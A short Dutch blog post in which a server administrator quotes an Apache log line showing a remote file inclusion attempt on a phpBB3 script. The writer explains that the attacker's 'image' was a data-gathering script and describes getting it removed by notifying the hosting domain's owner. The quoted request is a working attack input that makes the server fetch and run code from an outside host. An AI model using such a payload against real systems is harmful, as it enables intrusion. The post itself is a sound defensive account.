In de logs van Apache kwam ik een aantal keer de volgende regel tegen:

"GET /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 301 341 "-" "libwww-perl/5.810"

Nu komen dit soort regels vaker voor. Het bestand wing.jpg is in dit geval geen plaatje maar een scriptje dat allerlei gegevens uitleest en op het scherm toont. Met deze info hopen ze voldoende te krijgen om de server te hacken.

Dat gaat gelukkig bij mij niet lukken. Nu heb ik de whois opgevraagd van iqmm.pt en hieruit blijkt dat deze eigendom is van Bayer. Omdat ik er niet van uit ga dat Bayer bewust dit soort plaatjes op hun servers neerzetten heb ik ze 3 dagen geleden een mailtje gestuurd met de bovenstaande logregel.

En zoals ik al had verwacht, het plaatje is nu verdwenen. Ik heb weliswaar geen mailtje teruggehad, maar dat is ook niet het belangrijkste. Het plaatje is weg, daar gaat het om.